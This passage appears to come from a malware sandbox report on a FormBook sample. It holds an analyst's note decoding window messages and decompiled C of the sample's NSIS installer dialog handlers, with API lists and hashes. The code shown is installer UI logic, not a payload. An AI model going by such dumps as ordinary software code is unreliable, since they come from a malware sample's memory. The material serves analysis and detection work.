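    for raw in (0xFFFFFE6E, 0xFFFFFE6A, 0xFFFFFFFE):
        print(f"{raw:08X} -> {notify_name(raw)}")
```

Run against the copied lines, the script shows that 0x102D is LVM_GETITEMTEXTA, that the buffer handed to SetClipboardData is allocated with GMEM_MOVEABLE|GMEM_ZEROINIT (the allocation the clipboard requires), and that no GetClipboardData appears: in this function the clipboard is written with the contents of a list view after a popup-menu choice, not read. That is worth weighing against the sample-level "read data from the clipboard" signature before attributing clipboard theft to this code path. The 0x401/0x409 decoding as PBM_SETRANGE (0..30000) and PBM_SETBARCOLOR assumes the target window is a progress bar, which the trace cannot confirm because the HWND arguments are unresolved; the control IDs 0x3f9 and 0x408 and the 30000 progress range are the ones the NSIS installer stub uses, so this handler is plausibly the packer's own UI code rather than the FormBook payload, but the report does not state that and it is an inference, not a finding.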
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                    • String ID: {
                                                                                    • API String ID: 590372296-366298937
                                                                                    • Opcode ID: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
                                                                                    • Instruction ID: 14fcdc656e1060cfbb0aff817b75222918c1b3830be54c9a3b8aebe23af76a49
                                                                                    • Opcode Fuzzy Hash: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
                                                                                    • Instruction Fuzzy Hash: 0BA13A71900208FFDB11AFA1DC89AAF7F79FB04355F00817AFA05AA2A0C7755A41DF99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 97%
                                                                                    			E00404802(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                                                                    				struct HWND__* _v8;
                                                                                    				struct HWND__* _v12;
                                                                                    				signed int _v16;
                                                                                    				intOrPtr _v20;
                                                                                    				void* _v24;
                                                                                    				long _v28;
                                                                                    				int _v32;
                                                                                    				signed int _v40;
                                                                                    				int _v44;
                                                                                    				signed int* _v56;
                                                                                    				intOrPtr _v60;
                                                                                    				signed int _v64;
                                                                                    				long _v68;
                                                                                    				void* _v72;
                                                                                    				intOrPtr _v76;
                                                                                    				intOrPtr _v80;
                                                                                    				void* _v84;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				struct HWND__* _t182;
                                                                                    				int _t196;
                                                                                    				long _t202;
                                                                                    				signed int _t206;
                                                                                    				signed int _t217;
                                                                                    				void* _t220;
                                                                                    				void* _t221;
                                                                                    				int _t227;
                                                                                    				signed int _t232;
                                                                                    				signed int _t233;
                                                                                    				signed int _t240;
                                                                                    				struct HBITMAP__* _t250;
                                                                                    				void* _t252;
                                                                                    				char* _t268;
                                                                                    				signed char _t269;
                                                                                    				long _t274;
                                                                                    				int _t280;
                                                                                    				signed int* _t281;
                                                                                    				int _t282;
                                                                                    				long _t283;
                                                                                    				int _t285;
                                                                                    				long _t286;
                                                                                    				signed int _t287;
                                                                                    				long _t288;
                                                                                    				signed int _t291;
                                                                                    				signed int _t298;
                                                                                    				signed int _t300;
                                                                                    				signed int _t302;
                                                                                    				int* _t310;
                                                                                    				void* _t311;
                                                                                    				int _t315;
                                                                                    				int _t316;
                                                                                    				int _t317;
                                                                                    				signed int _t318;
                                                                                    				void* _t320;
                                                                                    
                                                                                    				_v12 = GetDlgItem(_a4, 0x3f9);
                                                                                    				_t182 = GetDlgItem(_a4, 0x408);
                                                                                    				_t280 =  *0x42ec48;
                                                                                    				_t320 = SendMessageA;
                                                                                    				_v8 = _t182;
                                                                                    				_t315 = 0;
                                                                                    				_v32 = _t280;
                                                                                    				_v20 =  *0x42ec30 + 0x94;
                                                                                    				if(_a8 != 0x110) {
                                                                                    					L23:
                                                                                    					if(_a8 != 0x405) {
                                                                                    						_t289 = _a16;
                                                                                    					} else {
                                                                                    						_a12 = _t315;
                                                                                    						_t289 = 1;
                                                                                    						_a8 = 0x40f;
                                                                                    						_a16 = 1;
                                                                                    					}
                                                                                    					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                    						_v16 = _t289;
                                                                                    						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
                                                                                    							if(( *0x42ec39 & 0x00000002) != 0) {
                                                                                    								L41:
                                                                                    								if(_v16 != _t315) {
                                                                                    									_t232 = _v16;
                                                                                    									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                                                                    										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                                                                    									}
                                                                                    									_t233 = _v16;
                                                                                    									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                                                                    										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                                                                    											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
                                                                                    										} else {
                                                                                    											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                                                                    										}
                                                                                    									}
                                                                                    								}
                                                                                    								goto L48;
                                                                                    							}
                                                                                    							if(_a8 == 0x413) {
                                                                                    								L33:
                                                                                    								_t289 = 0 | _a8 != 0x00000413;
                                                                                    								_t240 = E00404782(_v8, _a8 != 0x413);
                                                                                    								if(_t240 >= _t315) {
                                                                                    									_t93 = _t280 + 8; // 0x8
                                                                                    									_t310 = _t240 * 0x418 + _t93;
                                                                                    									_t289 =  *_t310;
                                                                                    									if((_t289 & 0x00000010) == 0) {
                                                                                    										if((_t289 & 0x00000040) == 0) {
                                                                                    											_t298 = _t289 ^ 0x00000001;
                                                                                    										} else {
                                                                                    											_t300 = _t289 ^ 0x00000080;
                                                                                    											if(_t300 >= 0) {
                                                                                    												_t298 = _t300 & 0xfffffffe;
                                                                                    											} else {
                                                                                    												_t298 = _t300 | 0x00000001;
                                                                                    											}
                                                                                    										}
                                                                                    										 *_t310 = _t298;
                                                                                    										E0040117D(_t240);
                                                                                    										_t289 = 1;
                                                                                    										_a8 = 0x40f;
                                                                                    										_a12 = 1;
                                                                                    										_a16 =  !( *0x42ec38) >> 0x00000008 & 1;
                                                                                    									}
                                                                                    								}
                                                                                    								goto L41;
                                                                                    							}
                                                                                    							_t289 = _a16;
                                                                                    							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                    								goto L41;
                                                                                    							}
                                                                                    							goto L33;
                                                                                    						} else {
                                                                                    							goto L48;
                                                                                    						}
                                                                                    					} else {
                                                                                    						L48:
                                                                                    						if(_a8 != 0x111) {
                                                                                    							L56:
                                                                                    							if(_a8 == 0x200) {
                                                                                    								SendMessageA(_v8, 0x200, _t315, _t315);
                                                                                    							}
                                                                                    							if(_a8 == 0x40b) {
                                                                                    								_t220 =  *0x42a07c;
                                                                                    								if(_t220 != _t315) {
                                                                                    									ImageList_Destroy(_t220);
                                                                                    								}
                                                                                    								_t221 =  *0x42a094;
                                                                                    								if(_t221 != _t315) {
                                                                                    									GlobalFree(_t221);
                                                                                    								}
                                                                                    								 *0x42a07c = _t315;
                                                                                    								 *0x42a094 = _t315;
                                                                                    								 *0x42ec80 = _t315;
                                                                                    							}
                                                                                    							if(_a8 != 0x40f) {
                                                                                    								L86:
                                                                                    								if(_a8 == 0x420 && ( *0x42ec39 & 0x00000001) != 0) {
                                                                                    									_t316 = (0 | _a16 == 0x00000020) << 3;
                                                                                    									ShowWindow(_v8, _t316);
                                                                                    									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                                                                    								}
                                                                                    								goto L89;
                                                                                    							} else {
                                                                                    								E004011EF(_t289, _t315, _t315);
                                                                                    								if(_a12 != _t315) {
                                                                                    									E0040140B(8);
                                                                                    								}
                                                                                    								if(_a16 == _t315) {
                                                                                    									L73:
                                                                                    									E004011EF(_t289, _t315, _t315);
                                                                                    									_v32 =  *0x42a094;
                                                                                    									_t196 =  *0x42ec48;
                                                                                    									_v60 = 0xf030;
                                                                                    									_v16 = _t315;
                                                                                    									if( *0x42ec4c <= _t315) {
                                                                                    										L84:
                                                                                    										InvalidateRect(_v8, _t315, 1);
                                                                                    										if( *((intOrPtr*)( *0x42e3fc + 0x10)) != _t315) {
                                                                                    											E0040473D(0x3ff, 0xfffffffb, E00404755(5));
                                                                                    										}
                                                                                    										goto L86;
                                                                                    									}
                                                                                    									_t281 = _t196 + 8;
                                                                                    									do {
                                                                                    										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                                                                    										if(_t202 != _t315) {
                                                                                    											_t291 =  *_t281;
                                                                                    											_v68 = _t202;
                                                                                    											_v72 = 8;
                                                                                    											if((_t291 & 0x00000001) != 0) {
                                                                                    												_v72 = 9;
                                                                                    												_v56 =  &(_t281[4]);
                                                                                    												_t281[0] = _t281[0] & 0x000000fe;
                                                                                    											}
                                                                                    											if((_t291 & 0x00000040) == 0) {
                                                                                    												_t206 = (_t291 & 0x00000001) + 1;
                                                                                    												if((_t291 & 0x00000010) != 0) {
                                                                                    													_t206 = _t206 + 3;
                                                                                    												}
                                                                                    											} else {
                                                                                    												_t206 = 3;
                                                                                    											}
                                                                                    											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                                                                    											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
                                                                                    											SendMessageA(_v8, 0x110d, _t315,  &_v72);
                                                                                    										}
                                                                                    										_v16 = _v16 + 1;
                                                                                    										_t281 =  &(_t281[0x106]);
                                                                                    									} while (_v16 <  *0x42ec4c);
                                                                                    									goto L84;
                                                                                    								} else {
                                                                                    									_t282 = E004012E2( *0x42a094);
                                                                                    									E00401299(_t282);
                                                                                    									_t217 = 0;
                                                                                    									_t289 = 0;
                                                                                    									if(_t282 <= _t315) {
                                                                                    										L72:
                                                                                    										SendMessageA(_v12, 0x14e, _t289, _t315);
                                                                                    										_a16 = _t282;
                                                                                    										_a8 = 0x420;
                                                                                    										goto L73;
                                                                                    									} else {
                                                                                    										goto L69;
                                                                                    									}
                                                                                    									do {
                                                                                    										L69:
                                                                                    										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
                                                                                    											_t289 = _t289 + 1;
                                                                                    										}
                                                                                    										_t217 = _t217 + 1;
                                                                                    									} while (_t217 < _t282);
                                                                                    									goto L72;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                    							goto L89;
                                                                                    						} else {
                                                                                    							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                                                                    							if(_t227 == 0xffffffff) {
                                                                                    								goto L89;
                                                                                    							}
                                                                                    							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                                                                                    							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
                                                                                    								_t283 = 0x20;
                                                                                    							}
                                                                                    							E00401299(_t283);
                                                                                    							SendMessageA(_a4, 0x420, _t315, _t283);
                                                                                    							_a12 = 1;
                                                                                    							_a16 = _t315;
                                                                                    							_a8 = 0x40f;
                                                                                    							goto L56;
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					 *0x42ec80 = _a4;
                                                                                    					_t285 = 2;
                                                                                    					_v28 = 0;
                                                                                    					_v16 = _t285;
                                                                                    					 *0x42a094 = GlobalAlloc(0x40,  *0x42ec4c << 2);
                                                                                    					_t250 = LoadBitmapA( *0x42ec20, 0x6e);
                                                                                    					 *0x42a088 =  *0x42a088 | 0xffffffff;
                                                                                    					_v24 = _t250;
                                                                                    					 *0x42a090 = SetWindowLongA(_v8, 0xfffffffc, E00404E03);
                                                                                    					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                                    					 *0x42a07c = _t252;
                                                                                    					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                                                                                    					SendMessageA(_v8, 0x1109, _t285,  *0x42a07c);
                                                                                    					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                                                                    						SendMessageA(_v8, 0x111b, 0x10, 0);
                                                                                    					}
                                                                                    					DeleteObject(_v24);
                                                                                    					_t286 = 0;
                                                                                    					do {
                                                                                    						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                                                                    						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                                                                                    							if(_t286 != 0x20) {
                                                                                    								_v16 = _t315;
                                                                                    							}
                                                                                    							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BE9(_t286, _t315, _t320, _t315, _t258)), _t286);
                                                                                    						}
                                                                                    						_t286 = _t286 + 1;
                                                                                    					} while (_t286 < 0x21);
                                                                                    					_t317 = _a16;
                                                                                    					_t287 = _v16;
                                                                                    					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                                                                    					_push(0x15);
                                                                                    					E00403E83(_a4);
                                                                                    					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                                                                    					_push(0x16);
                                                                                    					E00403E83(_a4);
                                                                                    					_t318 = 0;
                                                                                    					_t288 = 0;
                                                                                    					if( *0x42ec4c <= 0) {
                                                                                    						L19:
                                                                                    						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                                                    						goto L20;
                                                                                    					} else {
                                                                                    						_t311 = _v32 + 8;
                                                                                    						_v24 = _t311;
                                                                                    						do {
                                                                                    							_t268 = _t311 + 0x10;
                                                                                    							if( *_t268 != 0) {
                                                                                    								_v60 = _t268;
                                                                                    								_t269 =  *_t311;
                                                                                    								_t302 = 0x20;
                                                                                    								_v84 = _t288;
                                                                                    								_v80 = 0xffff0002;
                                                                                    								_v76 = 0xd;
                                                                                    								_v64 = _t302;
                                                                                    								_v40 = _t318;
                                                                                    								_v68 = _t269 & _t302;
                                                                                    								if((_t269 & 0x00000002) == 0) {
                                                                                    									if((_t269 & 0x00000004) == 0) {
                                                                                    										 *( *0x42a094 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                                    									} else {
                                                                                    										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                                                                    									}
                                                                                    								} else {
                                                                                    									_v76 = 0x4d;
                                                                                    									_v44 = 1;
                                                                                    									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                                    									_v28 = 1;
                                                                                    									 *( *0x42a094 + _t318 * 4) = _t274;
                                                                                    									_t288 =  *( *0x42a094 + _t318 * 4);
                                                                                    								}
                                                                                    							}
                                                                                    							_t318 = _t318 + 1;
                                                                                    							_t311 = _v24 + 0x418;
                                                                                    							_v24 = _t311;
                                                                                    						} while (_t318 <  *0x42ec4c);
                                                                                    						if(_v28 != 0) {
                                                                                    							L20:
                                                                                    							if(_v16 != 0) {
                                                                                    								E00403EB8(_v8);
                                                                                    								_t280 = _v32;
                                                                                    								_t315 = 0;
                                                                                    								goto L23;
                                                                                    							} else {
                                                                                    								ShowWindow(_v12, 5);
                                                                                    								E00403EB8(_v12);
                                                                                    								L89:
                                                                                    								return E00403EEA(_a8, _a12, _a16);
                                                                                    							}
                                                                                    						}
                                                                                    						goto L19;
                                                                                    					}
                                                                                    				}
                                                                                    			}
                                                                                    0x00404d2b
                                                                                    0x00404d2f
                                                                                    0x00404d31
                                                                                    0x00404d31
                                                                                    0x00404d21
                                                                                    0x00404d23
                                                                                    0x00404d23
                                                                                    0x00404d51
                                                                                    0x00404d5d
                                                                                    0x00404d6c
                                                                                    0x00404d6c
                                                                                    0x00404d6e
                                                                                    0x00404d71
                                                                                    0x00404d7a
                                                                                    0x00000000
                                                                                    0x00404c81
                                                                                    0x00404c8c
                                                                                    0x00404c8f
                                                                                    0x00404c94
                                                                                    0x00404c96
                                                                                    0x00404c9a
                                                                                    0x00404caa
                                                                                    0x00404cb4
                                                                                    0x00404cb6
                                                                                    0x00404cb9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404c9c
                                                                                    0x00404c9c
                                                                                    0x00404ca2
                                                                                    0x00404ca4
                                                                                    0x00404ca4
                                                                                    0x00404ca5
                                                                                    0x00404ca6
                                                                                    0x00000000
                                                                                    0x00404c9c
                                                                                    0x00404c7f
                                                                                    0x00404c63
                                                                                    0x00404ba0
                                                                                    0x00000000
                                                                                    0x00404bb6
                                                                                    0x00404bc0
                                                                                    0x00404bc5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404bd7
                                                                                    0x00404bdc
                                                                                    0x00404be8
                                                                                    0x00404be8
                                                                                    0x00404bea
                                                                                    0x00404bf9
                                                                                    0x00404bfb
                                                                                    0x00404c02
                                                                                    0x00404c05
                                                                                    0x00000000
                                                                                    0x00404c05
                                                                                    0x00404ba0
                                                                                    0x00404856
                                                                                    0x0040485b
                                                                                    0x00404865
                                                                                    0x00404866
                                                                                    0x0040486f
                                                                                    0x0040487a
                                                                                    0x00404885
                                                                                    0x0040488b
                                                                                    0x00404899
                                                                                    0x004048ae
                                                                                    0x004048b3
                                                                                    0x004048be
                                                                                    0x004048c7
                                                                                    0x004048dc
                                                                                    0x004048ed
                                                                                    0x004048fa
                                                                                    0x004048fa
                                                                                    0x004048ff
                                                                                    0x00404905
                                                                                    0x00404907
                                                                                    0x0040490a
                                                                                    0x0040490f
                                                                                    0x00404914
                                                                                    0x00404916
                                                                                    0x00404916
                                                                                    0x00404936
                                                                                    0x00404936
                                                                                    0x00404938
                                                                                    0x00404939
                                                                                    0x0040493e
                                                                                    0x00404941
                                                                                    0x00404944
                                                                                    0x00404948
                                                                                    0x0040494d
                                                                                    0x00404952
                                                                                    0x00404956
                                                                                    0x0040495b
                                                                                    0x00404960
                                                                                    0x00404962
                                                                                    0x0040496a
                                                                                    0x00404a34
                                                                                    0x00404a47
                                                                                    0x00000000
                                                                                    0x00404970
                                                                                    0x00404973
                                                                                    0x00404976
                                                                                    0x00404979
                                                                                    0x00404979
                                                                                    0x0040497f
                                                                                    0x00404985
                                                                                    0x00404988
                                                                                    0x0040498e
                                                                                    0x0040498f
                                                                                    0x00404994
                                                                                    0x0040499d
                                                                                    0x004049a4
                                                                                    0x004049a7
                                                                                    0x004049aa
                                                                                    0x004049ad
                                                                                    0x004049e9
                                                                                    0x00404a12
                                                                                    0x004049eb
                                                                                    0x004049f8
                                                                                    0x004049f8
                                                                                    0x004049af
                                                                                    0x004049b2
                                                                                    0x004049c1
                                                                                    0x004049cb
                                                                                    0x004049d3
                                                                                    0x004049da
                                                                                    0x004049e2
                                                                                    0x004049e2
                                                                                    0x004049ad
                                                                                    0x00404a18
                                                                                    0x00404a19
                                                                                    0x00404a25
                                                                                    0x00404a25
                                                                                    0x00404a32
                                                                                    0x00404a4d
                                                                                    0x00404a51
                                                                                    0x00404a6e
                                                                                    0x00404a73
                                                                                    0x00404a76
                                                                                    0x00000000
                                                                                    0x00404a53
                                                                                    0x00404a58
                                                                                    0x00404a61
                                                                                    0x00404dee
                                                                                    0x00404e00
                                                                                    0x00404e00
                                                                                    0x00404a51
                                                                                    0x00000000
                                                                                    0x00404a32
                                                                                    0x0040496a

APIs
• GetDlgItem.USER32 ref: 00404819
• GetDlgItem.USER32 ref: 00404826
• GlobalAlloc.KERNEL32(00000040,?), ref: 00404872
• LoadBitmapA.USER32 ref: 00404885
• SetWindowLongA.USER32 ref: 0040489F
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048B3
• ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004048C7
• SendMessageA.USER32(?,00001109,00000002), ref: 004048DC
• SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048E8
• SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048FA
• DeleteObject.GDI32(?), ref: 004048FF
• SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040492A
• SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404936
• SendMessageA.USER32(?,00001100,00000000,?), ref: 004049CB
• SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049F6
• SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A0A
• GetWindowLongA.USER32 ref: 00404A39
• SetWindowLongA.USER32 ref: 00404A47
• ShowWindow.USER32(?,00000005), ref: 00404A58
• SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B5B
• SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BC0
• SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BD5
• SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BF9
• SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C1F
• ImageList_Destroy.COMCTL32(?), ref: 00404C34
• GlobalFree.KERNEL32 ref: 00404C44
• SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CB4
• SendMessageA.USER32(?,00001102,00000410,?), ref: 00404D5D
• SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D6C
• InvalidateRect.USER32(?,00000000,00000001), ref: 00404D8C
• ShowWindow.USER32(?,00000000), ref: 00404DDA
• GetDlgItem.USER32 ref: 00404DE5
• ShowWindow.USER32(00000000), ref: 00404DEC
Strings
Memory Dump Source
• Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
Similarity
• API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
• String ID: $M$N
• API String ID: 1638840714-813528018
• Opcode ID: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
• Instruction ID: 6f0a98d5dd10ef4145f29f69d97320cca22844812bd755e22afdd9aff1593a00
• Opcode Fuzzy Hash: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
• Instruction Fuzzy Hash: A702B1B0A00209EFEB25CF95DD45AAE7BB5FB84314F10413AF610BA2E1C7799A41CF58
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 78%
			E004042C1(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x429870;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x42f000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040546C(0x3fb, _t146);
					E00405E29(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040546C(0x3fb, _t146);
							if(E0040579B(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405BC7(0x429068, _t146);
							_t87 = E00405F57(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405BC7(0x429068, _t146);
								_t89 = E0040574E(0x429068);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429068,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429068) {
                                                                                    									goto L30;
                                                                                    								} else {
                                                                                    									goto L26;
                                                                                    								}
                                                                                    								while(1) {
                                                                                    									L26:
                                                                                    									_t114 = _v16(0x429068,  &_v48,  &_v28,  &_v40);
                                                                                    									if(_t114 != 0) {
                                                                                    										break;
                                                                                    									}
                                                                                    									if(_t159 != 0) {
                                                                                    										 *_t159 =  *_t159 & _t114;
                                                                                    									}
                                                                                    									_t159 = E00405701(0x429068) - 1;
                                                                                    									 *_t159 = 0x5c;
                                                                                    									if(_t159 != 0x429068) {
                                                                                    										continue;
                                                                                    									} else {
                                                                                    										goto L30;
                                                                                    									}
                                                                                    								}
                                                                                    								_t150 = _v44;
                                                                                    								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                                    								_v44 = _t150 >> 0xa;
                                                                                    								_v12 = 1;
                                                                                    								_t158 = 0;
                                                                                    								__eflags = 0;
                                                                                    								L35:
                                                                                    								_t168 = 0x400;
                                                                                    								L36:
                                                                                    								_t95 = E00404755(5);
                                                                                    								if(_v12 != _t158) {
                                                                                    									_t197 = _v44;
                                                                                    									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                                    										_v8 = 2;
                                                                                    									}
                                                                                    								}
                                                                                    								if( *((intOrPtr*)( *0x42e3fc + 0x10)) != _t158) {
                                                                                    									E0040473D(0x3ff, 0xfffffffb, _t95);
                                                                                    									if(_v12 == _t158) {
                                                                                    										SetDlgItemTextA(_a4, _t168, 0x429058);
                                                                                    									} else {
                                                                                    										E00404678(_t168, 0xfffffffc, _v48, _v44);
                                                                                    									}
                                                                                    								}
                                                                                    								_t96 = _v8;
                                                                                    								 *0x42ecc4 = _t96;
                                                                                    								if(_t96 == _t158) {
                                                                                    									_v8 = E0040140B(7);
                                                                                    								}
                                                                                    								if(( *(_v32 + 0x14) & _t168) != 0) {
                                                                                    									_v8 = _t158;
                                                                                    								}
                                                                                    								E00403EA5(0 | _v8 == _t158);
                                                                                    								if(_v8 == _t158 &&  *0x42a08c == _t158) {
                                                                                    									E00404256();
                                                                                    								}
                                                                                    								 *0x42a08c = _t158;
                                                                                    								goto L53;
                                                                                    							}
                                                                                    						}
                                                                                    						_t185 = _a8 - 0x405;
                                                                                    						if(_a8 != 0x405) {
                                                                                    							goto L53;
                                                                                    						}
                                                                                    						goto L22;
                                                                                    					}
                                                                                    					_t118 = _a12 & 0x0000ffff;
                                                                                    					if(_t118 != 0x3fb) {
                                                                                    						L12:
                                                                                    						if(_t118 == 0x3e9) {
                                                                                    							_t152 = 7;
                                                                                    							memset( &_v76, 0, _t152 << 2);
                                                                                    							_v80 = _t166;
                                                                                    							_v72 = 0x42a0a0;
                                                                                    							_v60 = E00404612;
                                                                                    							_v56 = _t146;
                                                                                    							_v68 = E00405BE9(_t146, 0x42a0a0, _t166, 0x429470, _v12);
                                                                                    							_t122 =  &_v80;
                                                                                    							_v64 = 0x41;
                                                                                    							__imp__SHBrowseForFolderA(_t122);
                                                                                    							if(_t122 == 0) {
                                                                                    								_a8 = 0x40f;
                                                                                    							} else {
                                                                                    								__imp__CoTaskMemFree(_t122);
                                                                                    								E004056BA(_t146);
                                                                                    								_t125 =  *((intOrPtr*)( *0x42ec30 + 0x11c));
                                                                                    								if( *((intOrPtr*)( *0x42ec30 + 0x11c)) != 0 && _t146 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
                                                                                    									E00405BE9(_t146, 0x42a0a0, _t166, 0, _t125);
                                                                                    									if(lstrcmpiA(0x42dbc0, 0x42a0a0) != 0) {
                                                                                    										lstrcatA(_t146, 0x42dbc0);
                                                                                    									}
                                                                                    								}
                                                                                    								 *0x42a08c =  *0x42a08c + 1;
                                                                                    								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                                                                    							}
                                                                                    						}
                                                                                    						goto L20;
                                                                                    					}
                                                                                    					if(_a12 >> 0x10 != 0x300) {
                                                                                    						goto L53;
